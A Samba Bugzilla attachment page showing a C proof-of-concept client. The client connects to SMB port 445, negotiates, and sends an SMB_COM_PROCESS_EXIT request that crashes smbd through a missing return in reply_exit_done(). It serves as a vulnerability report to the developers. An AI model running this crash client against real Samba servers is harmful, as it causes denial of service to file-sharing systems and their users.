The Samba-Bugzilla – Attachment 17995 Details for
Bug 15430
missing return in reply_exit_done()
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
client that sends an SMB_COM_PROCESS_EXIT that causes smbd to crash due to a missing return in reply_exit_done()
smbd13a.c (text/x-csrc), 5.54 KB, created by
Robert Morris
on 2023-07-24 09:05:35 UTC
(
hide
)
Description:
client that sends an SMB_COM_PROCESS_EXIT that causes smbd to crash due to a missing return in reply_exit_done()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-07-24 09:05:35 UTC
Size:
5.54 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/socket.h> >#include <sys/ioctl.h> >#include <netinet/in.h> >#include <sys/wait.h> >#include <sys/resource.h> >#include <arpa/inet.h> >#include <assert.h> >#include <ctype.h> >#include <fcntl.h> >#include <signal.h> > >int s = -1; >int uid = 0; >int tid = 0; >int fid = 0; > >int >header(char *buf, int command) >{ > int ii = 0; > > // SMB-over-TCP 4-byte header > buf[ii++] = 0; // must be zero > buf[ii++] = 0; // high byte of len > *(short*)(buf+ii) = htons(sizeof(buf)-4); // non-inclusive len, filled later > ii += 2; > > // 32-byte SMB header, MS-CIFS 2.2.3.1 > buf[ii++] = 0xff; > buf[ii++] = 'S'; > buf[ii++] = 'M'; > buf[ii++] = 'B'; > buf[ii++] = command; > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = 0; // flags > *(short*)(buf+ii) = 0; // flags2 > ii += 2; > *(short*)(buf+ii) = 0; // PIDHigh > ii += 2; > ii += 8; // SecurityFeatures > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(short*)(buf+ii) = tid; // TID > ii += 2; > *(short*)(buf+ii) = 0; // PIDLow > ii += 2; > *(short*)(buf+ii) = uid; // UID > ii += 2; > *(short*)(buf+ii) = 0; // MID > ii += 2; > > return ii; >} > >void >negotiate() >{ > // SMB_COM_NEGOTIATE > { > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x72); > > // parameter block, MS-CIFS 2.2.3.2 > int param_words = 0; > buf[ii++] = param_words; // number of 16-bit words of parameters > printf("parameters start at %d\n", ii); > ii += param_words*2; > > // data block, MS-CIFS 2.2.3.3 > // SMB_COM_NEGOTIATE MS-CIFS 2.2.4.52 > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > buf[ii++] = 0x02; // BufferFormat > char *dialect = "NT LM 0.12"; // old-ish > memcpy(buf+ii, dialect, strlen(dialect) + 1); > ii += strlen(dialect) + 1; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); // this works > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("negotiate writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read negotiate response, MS-CIFS 2.2.4.52.2 > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = read(s, buf, sizeof(buf)); > printf("read %d for negotiate response (expecting 87)\n", cc); > printf("WordCount %d (expecting 17)\n", buf[36] & 0xff); > printf("DialectIndex %d (expecting 0)\n", *(short*)(buf+37)); > printf("SecurityMode 0x%x (expecting 0x1)\n", buf[37+2]); > } >} > >void >smb_exit() >{ > // SMB_COM_PROCESS_EXIT, MS-CIFS 2.2.4.18 > { > char buf[64]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0x11); > > // parameter block > buf[ii++] = 0; // number of 16-bit words of parameters > // ii is 37 at this point > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("smb_exit writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read nt_create response > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = read(s, buf, sizeof(buf)); > printf("read %d for smb_exit response\n", cc); > } >} > >int >main() >{ > //struct rlimit r; > //r.rlim_cur = r.rlim_max = 0; > //setrlimit(RLIMIT_CORE, &r); > > int pid = -1; > > signal(SIGPIPE, SIG_IGN); > signal(SIGTERM, SIG_IGN); > >#if 0 > system("killall nmbd smbd"); > sleep(1); > >#if SYM > // trick nmbd into thinking there is a non-local interface. > system("ifconfig tap0 create ; ifconfig tap0 9.0.0.1 up"); > int tap0 = open("/dev/tap0", 2); > if(tap0 < 0) { perror("/dev/tap0"); exit(1); } > system("ifconfig"); >#endif > > system("/usr/rtm/samba4/sbin/nmbd --help > /dev/null 2&>1"); > system("/usr/rtm/samba4/sbin/smbd --help > /dev/null 2&>1"); > > system("rm -f /usr/rtm/samba4/var/cache/browse.dat"); > system("rm -f /usr/rtm/samba4/private/msg.sock/*"); > system("rm -f /usr/rtm/samba4/private/*.tdb"); > system("rm -f /usr/rtm/samba4/var/lock/msg.lock/*"); > system("rm -f /usr/rtm/samba4/var/locks/*"); > system("rm -f /usr/rtm/samba4/var/lock/*"); > system("chown root /usr/rtm/samba4/var/lock/msg.lock /usr/rtm/samba4/private/msg.sock"); > > // these are just the result of smbpasswd -a z, xxxxxxxx > system("cp -p /usr/rtm/passdb.tdb.precious /usr/rtm/samba4/private/passdb.tdb"); > system("cp -p /usr/rtm/secrets.tdb.precious /usr/rtm/samba4/private/secrets.tdb"); > > system("rm -rf /tmp/smb ; mkdir /tmp/smb /tmp/smb/d"); > system("echo 1 > /tmp/smb/1 ; echo 2 > /tmp/smb/d/2"); > system("chmod ogu+rw /tmp/smb /tmp/smb/* /tmp/smb/*/*"); > > pid = fork(); > if(pid == 0){ > execl("/usr/rtm/samba4/sbin/smbd", "smbd", "--interactive", "--debuglevel=3", (void*)0); > perror("exec nmbd"); > exit(1); > } >#endif > > > struct sockaddr_in sin; > memset(&sin, 0, sizeof(sin)); > sin.sin_family = AF_INET; > sin.sin_port = htons(445); // SMB over TCP > sin.sin_addr.s_addr = inet_addr("127.0.0.1"); > > while(1){ > s = socket(AF_INET, SOCK_STREAM, 0); > if(connect(s, (struct sockaddr *)&sin, sizeof(sin)) == 0) > break; > close(s); > sleep(1); > } > > sleep(1); > > negotiate(); > smb_exit(); > > usleep(200000); > close(s); > > int st = 0; > int xpid = wait(&st); > if(!WIFEXITED(st)){ printf("child %d crashed, wanted %d, st %d\n", xpid, pid, st); while(1){} } >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=17995">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 15430
: 17995 |
18043
|
18048
|
18049